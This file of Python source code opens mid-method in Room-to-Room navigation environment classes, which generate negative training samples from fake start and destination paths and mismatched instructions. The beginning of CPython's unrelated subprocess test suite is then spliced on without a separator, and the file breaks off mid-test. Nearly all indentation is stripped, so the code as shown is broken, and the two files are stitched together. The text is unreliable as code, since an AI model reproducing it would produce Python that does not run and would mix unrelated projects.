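        # (abs(...) < 1 on integer lengths means exactly equal) but whose endpoint
        # lies more than 3m from the true destination, and symmetrically a fake
        # start for the true destination. If no such goal exists, fall back to the
        # original path and, for i > 0, reuse the previous item's negatives.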
for i,item in enumerate(self.batch):
self.start_list.append(item['path'][0])
self.dest_list.append(item['path'][-1])
path_length = len(item['path'])
scan = item['scan']
fake_flag = True
fail_flag = False
goal_list = [goal for goal in self.paths[scan][self.start_list[-1]]]
random.shuffle(goal_list)
for goal in goal_list:
if abs(path_length - len(self.paths[scan][self.start_list[-1]][goal])) < 1 and self.distances[scan][self.dest_list[-1]][goal] > 3:
self.fake_dest_list.append(self.paths[scan][self.start_list[-1]][goal])
# print('fake_dest',i)
fake_flag = False
break
if fake_flag:
fail_flag = True
# print('fake dest error')
self.fake_dest_list.append(item['path'])
fake_flag = True
goal_list = [goal for goal in self.paths[scan][self.dest_list[-1]]]
random.shuffle(goal_list)
for goal in goal_list:
if abs(path_length - len(self.paths[scan][self.dest_list[-1]][goal])) < 1 and self.distances[scan][self.start_list[-1]][goal] > 3:
self.fake_start_list.append(self.paths[scan][self.dest_list[-1]][goal])
fake_flag = False
break
if fake_flag:
fail_flag = True
# print('fake start error')
self.fake_start_list.append(item['path'])
# print('scan',scan)
if i != 0 and fail_flag:
self.batch[i] = deepcopy(self.batch[i-1])
self.start_list[-1] = self.start_list[-2]
self.dest_list[-1] = self.dest_list[-2]
self.fake_start_list[-1] = self.fake_start_list[-2]
self.fake_dest_list[-1] = self.fake_dest_list[-2]
# cnt_dest = 0
# cnt_star = 0
# scan = self.batch[i]['scan']
# item = self.batch[i]
# # print('scan after',scan)
# fake_dest_path = self.paths[scan][self.start_list[-1]][self.fake_dest_list[-1]]
# fake_star_path = self.paths[scan][self.fake_start_list[-1]][self.dest_list[-1]]
# for p in item['path']:
# if p in fake_dest_path:
# cnt_dest += 1
# if p in fake_star_path:
# cnt_star += 1
# dis_dest = self.distances[scan][item['path'][-1]][self.fake_dest_list[-1]]
# dis_star = self.distances[scan][item['path'][0]][self.fake_start_list[-1]]
# print('length',path_length,'fake dest',cnt_dest, 'fake start',cnt_star,'dis:','dest',dis_dest,'start',dis_star)
# print('ori',item['path'])
# print('des',self.paths[scan][self.start_list[-1]][self.fake_dest_list[-1]])
# print('sta',self.paths[scan][self.fake_start_list[-1]][self.dest_list[-1]])
# print('')
def reset_epoch(self, shuffle=False):
''' Reset the data index to beginning of epoch. Primarily for testing.
You must still call reset() for a new episode. '''
if shuffle:
random.shuffle(self.data)
self.ix = 0
def _shortest_path_action(self, state, goalViewpointId):
''' Determine next action on the shortest path to goal, for supervised training. '''
if state.location.viewpointId == goalViewpointId:
return goalViewpointId # Just stop here
path = self.paths[state.scanId][state.location.viewpointId][goalViewpointId]
nextViewpointId = path[1]
return nextViewpointId
def make_candidate(self, feature, scanId, viewpointId, viewId):
def _loc_distance(loc):
return np.sqrt(loc.rel_heading ** 2 + loc.rel_elevation ** 2)
base_heading = (viewId % 12) * math.radians(30)
adj_dict = {}
# long_id = "%s_%s" % (scanId, viewpointId)
# if long_id not in self.buffered_state_dict:
for ix in range(36):
if ix == 0:
self.sim.newEpisode(scanId, viewpointId, 0, math.radians(-30))
elif ix % 12 == 0:
self.sim.makeAction(0, 1.0, 1.0)
else:
self.sim.makeAction(0, 1.0, 0)
state = self.sim.getState()
assert state.viewIndex == ix
# Heading and elevation for the viewpoint center
heading = state.heading - base_heading
elevation = state.elevation
visual_feat = feature[ix]
# get adjacent locations
for j, loc in enumerate(state.navigableLocations[1:]):
                # If a loc is visible from multiple views, use the closest
                # view (in angular distance) as its representation.
                distance = _loc_distance(loc)
                # Heading and elevation for the loc
loc_heading = heading + loc.rel_heading
loc_elevation = elevation + loc.rel_elevation
angle_feat = utils.angle_feature(loc_heading, loc_elevation)
if (loc.viewpointId not in adj_dict or
distance < adj_dict[loc.viewpointId]['distance']):
adj_dict[loc.viewpointId] = {
'heading': loc_heading,
'elevation': loc_elevation,
"normalized_heading": state.heading + loc.rel_heading,
'scanId':scanId,
'viewpointId': loc.viewpointId, # Next viewpoint id
'pointId': ix,
'distance': distance,
'idx': j + 1,
'feature': np.concatenate((visual_feat, angle_feat), -1)
}
candidate = list(adj_dict.values())
# self.buffered_state_dict[long_id] = [
# {key: c[key]
# for key in
# ['normalized_heading', 'elevation', 'scanId', 'viewpointId',
# 'pointId', 'idx']}
# for c in candidate
# ]
return candidate
# else:
# candidate = self.buffered_state_dict[long_id]
# candidate_new = []
# for c in candidate:
# c_new = c.copy()
# ix = c_new['pointId']
# normalized_heading = c_new['normalized_heading']
# visual_feat = feature[ix]
# loc_heading = normalized_heading - base_heading
# c_new['heading'] = loc_heading
# angle_feat = utils.angle_feature(c_new['heading'], c_new['elevation'])
# c_new['feature'] = np.concatenate((visual_feat, angle_feat), -1)
# c_new.pop('normalized_heading')
# candidate_new.append(c_new)
# return candidate_new
def _get_obs(self):
obs = []
for i, (feature, state) in enumerate(self.env.getStates()):
item = self.batch[i]
base_view_id = state.viewIndex
# Full features
candidate = self.make_candidate(feature, state.scanId, state.location.viewpointId, state.viewIndex)
            # (visual_feature, angle_feature) for views
feature = np.concatenate((feature, self.angle_feature[base_view_id]), -1)
path = item['path']
vp = state.location.viewpointId
nxp = None
for j,p in enumerate(path[1:]):
if path[j] == vp:
nxp = p
break
if nxp is None:
nxp = path[-1]
obs.append({
'instr_id' : item['instr_id'],
'scan' : state.scanId,
'viewpoint' : state.location.viewpointId,
'viewIndex' : state.viewIndex,
'heading' : state.heading,
'elevation' : state.elevation,
'feature' : feature,
'candidate': candidate,
'navigableLocations' : state.navigableLocations,
'instructions' : item['instructions'],
'teacher' : self._shortest_path_action(state, nxp),
'path_id' : item['path_id']
})
if 'instr_encoding' in item:
obs[-1]['instr_encoding'] = item['instr_encoding']
# A2C reward. The negative distance between the state and the final state
obs[-1]['distance'] = self.distances[state.scanId][state.location.viewpointId][item['path'][-1]]
return obs
def reset(self, batch=None, inject=False, type_ ='ps', **kwargs):
''' Load a new minibatch / episodes. '''
if batch is None: # Allow the user to explicitly define the batch
self._next_minibatch(**kwargs)
else:
if inject: # Inject the batch into the next minibatch
self._next_minibatch(**kwargs)
self.batch[:len(batch)] = batch
else: # Else set the batch to the current batch
self.batch = batch
assert type_ in ['ps','rw']
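        # 'rw': replace each item's path with the pre-computed fake path (negative
        #       trajectories, alternating between fake-start and fake-dest paths).
        # 'ps': keep the paths but swap in instructions from other items of the
        #       same scan (path-instruction mismatch negatives).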
if type_ == 'rw':
for i in range(len(self.batch)):
if i % 2 == 0:
self.batch[i]['path'] = self.fake_start_list[i]
else:
self.batch[i]['path'] = self.fake_dest_list[i]
elif type_ == 'ps':
ins_list_shuffle = []
for item in self.batch:
scan = item['scan']
ins = item['instructions']
random.shuffle(self.scan_specific_data[scan])
                # Swap in an instruction from another item of the same scan that differs
                # from the current one; fall back to the first (shuffled) entry if none differs.
                case = self.scan_specific_data[scan][0]
                for other in self.scan_specific_data[scan]:
                    if other['instructions'] != ins:
                        case = other
                        break
                ins_list_shuffle.append((case['instructions'], case['instr_encoding']))
# random.shuffle(ins_list_shuffle)
for i in range(len(self.batch)):
self.batch[i]['instructions'] = ins_list_shuffle[i][0]
self.batch[i]['instr_encoding'] = ins_list_shuffle[i][1]
scanIds = [item['scan'] for item in self.batch]
viewpointIds = [item['path'][0] for item in self.batch]
headings = [item['heading'] for item in self.batch]
self.env.newEpisodes(scanIds, viewpointIds, headings)
return self._get_obs()
def step(self, actions):
''' Take action (same interface as makeActions) '''
self.env.makeActions(actions)
return self._get_obs()
def get_statistics(self):
stats = {}
length = 0
path = 0
for datum in self.data:
length += len(self.tok.split_sentence(datum['instructions']))
path += self.distances[datum['scan']][datum['path'][0]][datum['path'][-1]]
stats['length'] = length / len(self.data)
stats['path'] = path / len(self.data)
return stats
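# Usage sketch for the negative-sample environment (illustrative only, assuming
# the same feature store / tokenizer objects as above):
#
#   neg_env = R2RBatch_neg(feature_store, batch_size=64, splits=['train'], tokenizer=tok)
#   obs = neg_env.reset(type_='rw')   # negatives with perturbed start/goal paths
#   obs = neg_env.reset(type_='ps')   # negatives with mismatched instructions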
class R2RBatch_neg_bk():
''' Implements the Room to Room navigation task, using discretized viewpoints and pretrained features '''
def __init__(self, feature_store, batch_size=100, seed=10, splits=['train'], tokenizer=None,
name=None):
self.env = EnvBatch(feature_store=feature_store, batch_size=batch_size)
if feature_store:
self.feature_size = self.env.feature_size
self.data = []
if tokenizer:
self.tok = tokenizer
scans = []
self.scan_specific_data = {}
for split in splits:
for item in load_datasets([split]):
# Split multiple instructions into separate entries
for j,instr in enumerate(item['instructions']):
if item['scan'] not in self.env.featurized_scans: # For fast training
continue
new_item = dict(item)
new_item['instr_id'] = '%s_%d' % (item['path_id'], j)
new_item['instructions'] = instr
if tokenizer:
new_item['instr_encoding'] = tokenizer.encode_sentence(instr)
                    if not tokenizer or new_item['instr_encoding'] is not None:  # Skip items whose instructions could not be encoded
self.data.append(new_item)
if not item['scan'] in self.scan_specific_data:
self.scan_specific_data[item['scan']] = []
self.scan_specific_data[item['scan']].append(new_item)
scans.append(item['scan'])
if name is None:
self.name = splits[0] if len(splits) > 0 else "FAKE"
else:
self.name = name
self.scans = set(scans)
self.splits = splits
self.seed = seed
random.seed(self.seed)
random.shuffle(self.data)
self.ix = 0
self.batch_size = batch_size
self._load_nav_graphs()
self.angle_feature = utils.get_all_point_angle_feature()
self.sim = utils.new_simulator()
# self.buffered_state_dict = {}
        # In the supervised setup the fake data is identical to the real data
self.fake_data = self.data
        print('R2RBatch_neg_bk loaded with %d instructions, using splits: %s' % (len(self.data), ",".join(splits)))
def size(self):
return len(self.data)
def _load_nav_graphs(self):
"""
load graph from self.scan,
Store the graph {scan_id: graph} in self.graphs
Store the shortest path {scan_id: {view_id_x: {view_id_y: [path]} } } in self.paths
Store the distances in self.distances. (Structure see above)
Load connectivity graph for each scan, useful for reasoning about shortest paths
:return: None
"""
print('Loading navigation graphs for %d scans' % len(self.scans))
self.graphs = load_nav_graphs(self.scans)
self.paths = {}
for scan, G in self.graphs.items(): # compute all shortest paths
self.paths[scan] = dict(nx.all_pairs_dijkstra_path(G))
self.distances = {}
for scan, G in self.graphs.items(): # compute all shortest paths
self.distances[scan] = dict(nx.all_pairs_dijkstra_path_length(G))
def _next_minibatch(self, tile_one=False, batch_size=None, **kwargs):
"""
Store the minibach in 'self.batch'
:param tile_one: Tile the one into batch_size
:return: None
"""
if batch_size is None:
batch_size = self.batch_size
if tile_one:
batch = [self.data[self.ix]] * batch_size
self.ix += 1
if self.ix >= len(self.data):
random.shuffle(self.data)
self.ix -= len(self.data)
else:
batch = self.data[self.ix: self.ix+batch_size]
if len(batch) < batch_size:
random.shuffle(self.data)
self.ix = batch_size - len(batch)
batch += self.data[:self.ix]
else:
self.ix += batch_size
self.batch = deepcopy(batch)
self.start_list = []
self.dest_list = []
self.fake_start_list = []
self.fake_dest_list = []
for i,item in enumerate(self.batch):
self.start_list.append(item['path'][0])
self.dest_list.append(item['path'][-1])
path_length = len(item['path'])
scan = item['scan']
fake_flag = True
fail_flag = False
goal_list = [goal for goal in self.paths[scan][self.start_list[-1]]]
random.shuffle(goal_list)
for goal in goal_list:
if abs(path_length - len(self.paths[scan][self.start_list[-1]][goal])) < 1 and self.distances[scan][self.dest_list[-1]][goal] > 3:
self.fake_dest_list.append(goal)
# print('fake_dest',i)
fake_flag = False
break
if fake_flag:
fail_flag = True
# print('fake dest error')
self.fake_dest_list.append(item['path'][-1])
fake_flag = True
goal_list = [goal for goal in self.paths[scan][self.dest_list[-1]]]
random.shuffle(goal_list)
for goal in goal_list:
if abs(path_length - len(self.paths[scan][self.dest_list[-1]][goal])) < 1 and self.distances[scan][self.start_list[-1]][goal] > 3:
self.fake_start_list.append(goal)
fake_flag = False
break
if fake_flag:
fail_flag = True
# print('fake start error')
self.fake_start_list.append(item['path'][0])
# print('scan',scan)
if i != 0 and fail_flag:
self.batch[i] = deepcopy(self.batch[i-1])
self.start_list[-1] = self.start_list[-2]
self.dest_list[-1] = self.dest_list[-2]
self.fake_start_list[-1] = self.fake_start_list[-2]
self.fake_dest_list[-1] = self.fake_dest_list[-2]
# cnt_dest = 0
# cnt_star = 0
# scan = self.batch[i]['scan']
# item = self.batch[i]
# # print('scan after',scan)
# fake_dest_path = self.paths[scan][self.start_list[-1]][self.fake_dest_list[-1]]
# fake_star_path = self.paths[scan][self.fake_start_list[-1]][self.dest_list[-1]]
# for p in item['path']:
# if p in fake_dest_path:
# cnt_dest += 1
# if p in fake_star_path:
# cnt_star += 1
# dis_dest = self.distances[scan][item['path'][-1]][self.fake_dest_list[-1]]
# dis_star = self.distances[scan][item['path'][0]][self.fake_start_list[-1]]
# print('length',path_length,'fake dest',cnt_dest, 'fake start',cnt_star,'dis:','dest',dis_dest,'start',dis_star)
# print('ori',item['path'])
# print('des',self.paths[scan][self.start_list[-1]][self.fake_dest_list[-1]])
# print('sta',self.paths[scan][self.fake_start_list[-1]][self.dest_list[-1]])
# print('')
def reset_epoch(self, shuffle=False):
''' Reset the data index to beginning of epoch. Primarily for testing.
You must still call reset() for a new episode. '''
if shuffle:
random.shuffle(self.data)
self.ix = 0
def _shortest_path_action(self, state, goalViewpointId):
''' Determine next action on the shortest path to goal, for supervised training. '''
if state.location.viewpointId == goalViewpointId:
return goalViewpointId # Just stop here
path = self.paths[state.scanId][state.location.viewpointId][goalViewpointId]
nextViewpointId = path[1]
return nextViewpointId
def make_candidate(self, feature, scanId, viewpointId, viewId):
def _loc_distance(loc):
return np.sqrt(loc.rel_heading ** 2 + loc.rel_elevation ** 2)
base_heading = (viewId % 12) * math.radians(30)
adj_dict = {}
# long_id = "%s_%s" % (scanId, viewpointId)
# if long_id not in self.buffered_state_dict:
for ix in range(36):
if ix == 0:
self.sim.newEpisode(scanId, viewpointId, 0, math.radians(-30))
elif ix % 12 == 0:
self.sim.makeAction(0, 1.0, 1.0)
else:
self.sim.makeAction(0, 1.0, 0)
state = self.sim.getState()
assert state.viewIndex == ix
# Heading and elevation for the viewpoint center
heading = state.heading - base_heading
elevation = state.elevation
visual_feat = feature[ix]
# get adjacent locations
for j, loc in enumerate(state.navigableLocations[1:]):
                # If a loc is visible from multiple views, use the closest
                # view (in angular distance) as its representation.
                distance = _loc_distance(loc)
                # Heading and elevation for the loc
loc_heading = heading + loc.rel_heading
loc_elevation = elevation + loc.rel_elevation
angle_feat = utils.angle_feature(loc_heading, loc_elevation)
if (loc.viewpointId not in adj_dict or
distance < adj_dict[loc.viewpointId]['distance']):
adj_dict[loc.viewpointId] = {
'heading': loc_heading,
'elevation': loc_elevation,
"normalized_heading": state.heading + loc.rel_heading,
'scanId':scanId,
'viewpointId': loc.viewpointId, # Next viewpoint id
'pointId': ix,
'distance': distance,
'idx': j + 1,
'feature': np.concatenate((visual_feat, angle_feat), -1)
}
candidate = list(adj_dict.values())
# self.buffered_state_dict[long_id] = [
# {key: c[key]
# for key in
# ['normalized_heading', 'elevation', 'scanId', 'viewpointId',
# 'pointId', 'idx']}
# for c in candidate
# ]
return candidate
# else:
# candidate = self.buffered_state_dict[long_id]
# candidate_new = []
# for c in candidate:
# c_new = c.copy()
# ix = c_new['pointId']
# normalized_heading = c_new['normalized_heading']
# visual_feat = feature[ix]
# loc_heading = normalized_heading - base_heading
# c_new['heading'] = loc_heading
# angle_feat = utils.angle_feature(c_new['heading'], c_new['elevation'])
# c_new['feature'] = np.concatenate((visual_feat, angle_feat), -1)
# c_new.pop('normalized_heading')
# candidate_new.append(c_new)
# return candidate_new
def _get_obs(self):
obs = []
for i, (feature, state) in enumerate(self.env.getStates()):
item = self.batch[i]
base_view_id = state.viewIndex
# Full features
candidate = self.make_candidate(feature, state.scanId, state.location.viewpointId, state.viewIndex)
            # (visual_feature, angle_feature) for views
feature = np.concatenate((feature, self.angle_feature[base_view_id]), -1)
obs.append({
'instr_id' : item['instr_id'],
'scan' : state.scanId,
'viewpoint' : state.location.viewpointId,
'viewIndex' : state.viewIndex,
'heading' : state.heading,
'elevation' : state.elevation,
'feature' : feature,
'candidate': candidate,
'navigableLocations' : state.navigableLocations,
'instructions' : item['instructions'],
'teacher' : self._shortest_path_action(state, item['path'][-1]),
'path_id' : item['path_id']
})
if 'instr_encoding' in item:
obs[-1]['instr_encoding'] = item['instr_encoding']
# A2C reward. The negative distance between the state and the final state
obs[-1]['distance'] = self.distances[state.scanId][state.location.viewpointId][item['path'][-1]]
return obs
def reset(self, batch=None, inject=False, type_ ='ps', **kwargs):
''' Load a new minibatch / episodes. '''
if batch is None: # Allow the user to explicitly define the batch
self._next_minibatch(**kwargs)
else:
if inject: # Inject the batch into the next minibatch
self._next_minibatch(**kwargs)
self.batch[:len(batch)] = batch
else: # Else set the batch to the current batch
self.batch = batch
assert type_ in ['ps','rw']
if type_ == 'rw':
for i in range(len(self.batch)):
if i % 2 == 0:
self.batch[i]['path'] = [self.fake_start_list[i],self.dest_list[i]]
else:
self.batch[i]['path'] = [self.start_list[i],self.fake_dest_list[i]]
elif type_ == 'ps':
ins_list_shuffle = []
for item in self.batch:
scan = item['scan']
ins = item['instructions']
random.shuffle(self.scan_specific_data[scan])
                # Swap in an instruction from another item of the same scan that differs
                # from the current one; fall back to the first (shuffled) entry if none differs.
                case = self.scan_specific_data[scan][0]
                for other in self.scan_specific_data[scan]:
                    if other['instructions'] != ins:
                        case = other
                        break
                ins_list_shuffle.append((case['instructions'], case['instr_encoding']))
# random.shuffle(ins_list_shuffle)
for i in range(len(self.batch)):
self.batch[i]['instructions'] = ins_list_shuffle[i][0]
self.batch[i]['instr_encoding'] = ins_list_shuffle[i][1]
scanIds = [item['scan'] for item in self.batch]
viewpointIds = [item['path'][0] for item in self.batch]
headings = [item['heading'] for item in self.batch]
self.env.newEpisodes(scanIds, viewpointIds, headings)
return self._get_obs()
def step(self, actions):
''' Take action (same interface as makeActions) '''
self.env.makeActions(actions)
return self._get_obs()
def get_statistics(self):
stats = {}
length = 0
path = 0
for datum in self.data:
length += len(self.tok.split_sentence(datum['instructions']))
path += self.distances[datum['scan']][datum['path'][0]][datum['path'][-1]]
stats['length'] = length / len(self.data)
stats['path'] = path / len(self.data)
return stats
class R2RBatch_graph():
''' Implements the Room to Room navigation task, using discretized viewpoints and pretrained features '''
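    # Graph variant: candidates keep the visual and angle features separate so a
    # GCN can process the visual features first; the angle features are
    # concatenated afterwards (see 'angle_feature' in _get_obs below).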
def __init__(self, feature_store, batch_size=100, seed=10, splits=['train'], tokenizer=None,
name=None):
self.env = EnvBatchGraph(feature_store=feature_store, batch_size=batch_size)
if feature_store:
self.feature_size = self.env.feature_size
self.data = []
if tokenizer:
self.tok = tokenizer
scans = []
for split in splits:
for item in load_datasets([split]):
# Split multiple instructions into separate entries
for j,instr in enumerate(item['instructions']):
if item['scan'] not in self.env.featurized_scans: # For fast training
continue
new_item = dict(item)
new_item['instr_id'] = '%s_%d' % (item['path_id'], j)
new_item['instructions'] = instr
if tokenizer:
new_item['instr_encoding'] = tokenizer.encode_sentence(instr)
                    if not tokenizer or new_item['instr_encoding'] is not None:  # Skip items whose instructions could not be encoded
self.data.append(new_item)
scans.append(item['scan'])
if name is None:
self.name = splits[0] if len(splits) > 0 else "FAKE"
else:
self.name = name
self.scans = set(scans)
self.splits = splits
self.seed = seed
random.seed(self.seed)
random.shuffle(self.data)
self.ix = 0
self.batch_size = batch_size
self._load_nav_graphs()
self.angle_feature = utils.get_all_point_angle_feature()
self.sim = utils.new_simulator()
self.buffered_state_dict = {}
        # In the supervised setup the fake data is identical to the real data
self.fake_data = self.data
print('R2RBatchGraph loaded with %d instructions, using splits: %s' % (len(self.data), ",".join(splits)))
def size(self):
return len(self.data)
def _load_nav_graphs(self):
"""
load graph from self.scan,
Store the graph {scan_id: graph} in self.graphs
Store the shortest path {scan_id: {view_id_x: {view_id_y: [path]} } } in self.paths
Store the distances in self.distances. (Structure see above)
Load connectivity graph for each scan, useful for reasoning about shortest paths
:return: None
"""
print('Loading navigation graphs for %d scans' % len(self.scans))
self.graphs = load_nav_graphs(self.scans)
self.paths = {}
for scan, G in self.graphs.items(): # compute all shortest paths
self.paths[scan] = dict(nx.all_pairs_dijkstra_path(G))
self.distances = {}
for scan, G in self.graphs.items(): # compute all shortest paths
self.distances[scan] = dict(nx.all_pairs_dijkstra_path_length(G))
def _next_minibatch(self, tile_one=False, batch_size=None, **kwargs):
"""
Store the minibach in 'self.batch'
:param tile_one: Tile the one into batch_size
:return: None
"""
if batch_size is None:
batch_size = self.batch_size
if tile_one:
batch = [self.data[self.ix]] * batch_size
self.ix += 1
if self.ix >= len(self.data):
random.shuffle(self.data)
self.ix -= len(self.data)
else:
batch = self.data[self.ix: self.ix+batch_size]
if len(batch) < batch_size:
random.shuffle(self.data)
self.ix = batch_size - len(batch)
batch += self.data[:self.ix]
else:
self.ix += batch_size
self.batch = batch
def reset_epoch(self, shuffle=False):
''' Reset the data index to beginning of epoch. Primarily for testing.
You must still call reset() for a new episode. '''
if shuffle:
random.shuffle(self.data)
self.ix = 0
def _shortest_path_action(self, state, goalViewpointId):
''' Determine next action on the shortest path to goal, for supervised training. '''
if state.location.viewpointId == goalViewpointId:
return goalViewpointId # Just stop here
path = self.paths[state.scanId][state.location.viewpointId][goalViewpointId]
nextViewpointId = path[1]
return nextViewpointId
def make_candidate(self, feature, scanId, viewpointId, viewId):
def _loc_distance(loc):
return np.sqrt(loc.rel_heading ** 2 + loc.rel_elevation ** 2)
base_heading = (viewId % 12) * math.radians(30)
adj_dict = {}
long_id = "%s_%s" % (scanId, viewpointId)
if long_id not in self.buffered_state_dict:
for ix in range(36):
if ix == 0:
self.sim.newEpisode(scanId, viewpointId, 0, math.radians(-30))
elif ix % 12 == 0:
self.sim.makeAction(0, 1.0, 1.0)
else:
self.sim.makeAction(0, 1.0, 0)
state = self.sim.getState()
assert state.viewIndex == ix
# Heading and elevation for the viewpoint center
heading = state.heading - base_heading
elevation = state.elevation
visual_feat = feature[ix]
# get adjacent locations
for j, loc in enumerate(state.navigableLocations[1:]):
                    # If a loc is visible from multiple views, use the closest
                    # view (in angular distance) as its representation.
                    distance = _loc_distance(loc)
                    # Heading and elevation for the loc
loc_heading = heading + loc.rel_heading
loc_elevation = elevation + loc.rel_elevation
angle_feat = utils.angle_feature(loc_heading, loc_elevation)
if (loc.viewpointId not in adj_dict or
distance < adj_dict[loc.viewpointId]['distance']):
adj_dict[loc.viewpointId] = {
'heading': loc_heading,
'elevation': loc_elevation,
"normalized_heading": state.heading + loc.rel_heading,
'scanId':scanId,
'viewpointId': loc.viewpointId, # Next viewpoint id
'pointId': ix,
'distance': distance,
'idx': j + 1,
# 'feature': np.concatenate((visual_feat, angle_feat), -1)
'feature': visual_feat,
'angle_feature': angle_feat
}
candidate = list(adj_dict.values())
self.buffered_state_dict[long_id] = [
{key: c[key]
for key in
['normalized_heading', 'elevation', 'scanId', 'viewpointId',
'pointId', 'idx']}
for c in candidate
]
return candidate
else:
candidate = self.buffered_state_dict[long_id]
candidate_new = []
for c in candidate:
c_new = c.copy()
ix = c_new['pointId']
normalized_heading = c_new['normalized_heading']
visual_feat = feature[ix]
loc_heading = normalized_heading - base_heading
c_new['heading'] = loc_heading
angle_feat = utils.angle_feature(c_new['heading'], c_new['elevation'])
# c_new['feature'] = np.concatenate((visual_feat, angle_feat), -1)
c_new['feature'] = visual_feat
c_new['angle_feature'] = angle_feat
c_new.pop('normalized_heading')
candidate_new.append(c_new)
return candidate_new
def _get_obs(self):
obs = []
for i, (feature, state) in enumerate(self.env.getStates()):
item = self.batch[i]
base_view_id = state.viewIndex
# Full features
candidate = self.make_candidate(feature, state.scanId, state.location.viewpointId, state.viewIndex)
            # (visual_feature, angle_feature) for views
# feature = np.concatenate((feature, self.angle_feature[base_view_id]), -1)
obs.append({
'instr_id' : item['instr_id'],
'scan' : state.scanId,
'viewpoint' : state.location.viewpointId,
'viewIndex' : state.viewIndex,
'heading' : state.heading,
'elevation' : state.elevation,
'feature' : feature, # (64,2051)*36
'candidate': candidate,
'angle_feature': self.angle_feature[base_view_id], # should be concate to 'feature' after GCN's output
'navigableLocations' : state.navigableLocations,
'instructions' : item['instructions'],
'teacher' : self._shortest_path_action(state, item['path'][-1]),
'path_id' : item['path_id']
})
if 'instr_encoding' in item:
obs[-1]['instr_encoding'] = item['instr_encoding']
# A2C reward. The negative distance between the state and the final state
obs[-1]['distance'] = self.distances[state.scanId][state.location.viewpointId][item['path'][-1]]
return obs
def reset(self, batch=None, inject=False, **kwargs):
''' Load a new minibatch / episodes. '''
if batch is None: # Allow the user to explicitly define the batch
self._next_minibatch(**kwargs)
else:
if inject: # Inject the batch into the next minibatch
self._next_minibatch(**kwargs)
self.batch[:len(batch)] = batch
else: # Else set the batch to the current batch
self.batch = batch
scanIds = [item['scan'] for item in self.batch]
viewpointIds = [item['path'][0] for item in self.batch]
headings = [item['heading'] for item in self.batch]
self.env.newEpisodes(scanIds, viewpointIds, headings)
return self._get_obs()
def step(self, actions):
''' Take action (same interface as makeActions) '''
self.env.makeActions(actions)
return self._get_obs()
def get_statistics(self):
stats = {}
length = 0
path = 0
for datum in self.data:
length += len(self.tok.split_sentence(datum['instructions']))
path += self.distances[datum['scan']][datum['path'][0]][datum['path'][-1]]
stats['length'] = length / len(self.data)
stats['path'] = path / len(self.data)
return stats
test_subprocess.py
import unittest
from unittest import mock
from test import support
from test.support import import_helper
from test.support import os_helper
from test.support import warnings_helper
import subprocess
import sys
import signal
import io
import itertools
import os
import errno
import tempfile
import time
import traceback
import types
import selectors
import sysconfig
import select
import shutil
import threading
import gc
import textwrap
import json
import pathlib
from test.support.os_helper import FakePath
try:
import _testcapi
except ImportError:
_testcapi = None
try:
import pwd
except ImportError:
pwd = None
try:
import grp
except ImportError:
grp = None
try:
import fcntl
except ImportError:
fcntl = None
if support.PGO:
raise unittest.SkipTest("test is not helpful for PGO")
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
if mswindows:
SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
'os.O_BINARY);')
else:
SETBINARY = ''
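# SETBINARY is prepended to child scripts on Windows so that stdout is switched to
# binary mode and CRLF translation does not interfere with byte-exact comparisons.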
NONEXISTING_CMD = ('nonexisting_i_hope',)
# Ignore errors that indicate the command was not found
NONEXISTING_ERRORS = (FileNotFoundError, NotADirectoryError, PermissionError)
ZERO_RETURN_CMD = (sys.executable, '-c', 'pass')
def setUpModule():
shell_true = shutil.which('true')
if shell_true is None:
return
if (os.access(shell_true, os.X_OK) and
subprocess.run([shell_true]).returncode == 0):
global ZERO_RETURN_CMD
ZERO_RETURN_CMD = (shell_true,) # Faster than Python startup.
class BaseTestCase(unittest.TestCase):
def setUp(self):
# Try to minimize the number of children we have so this test
# doesn't crash on some buildbots (Alphas in particular).
support.reap_children()
def tearDown(self):
if not mswindows:
# subprocess._active is not used on Windows and is set to None.
for inst in subprocess._active:
inst.wait()
subprocess._cleanup()
self.assertFalse(
subprocess._active, "subprocess._active not empty"
)
self.doCleanups()
support.reap_children()
class PopenTestException(Exception):
pass
class PopenExecuteChildRaises(subprocess.Popen):
"""Popen subclass for testing cleanup of subprocess.PIPE filehandles when
_execute_child fails.
"""
def _execute_child(self, *args, **kwargs):
raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_io_buffered_by_default(self):
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
self.assertIsInstance(p.stdin, io.BufferedIOBase)
self.assertIsInstance(p.stdout, io.BufferedIOBase)
self.assertIsInstance(p.stderr, io.BufferedIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_io_unbuffered_works(self):
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, bufsize=0)
try:
self.assertIsInstance(p.stdin, io.RawIOBase)
self.assertIsInstance(p.stdout, io.RawIOBase)
self.assertIsInstance(p.stderr, io.RawIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_call_timeout(self):
# call() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.call waits for the
# child.
self.assertRaises(subprocess.TimeoutExpired, subprocess.call,
[sys.executable, "-c", "while True: pass"],
timeout=0.1)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call(ZERO_RETURN_CMD)
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print('BDFL')"])
self.assertIn(b'BDFL', output)
def test_check_output_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn(b'BDFL', output)
def test_check_output_stdin_arg(self):
# check_output() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
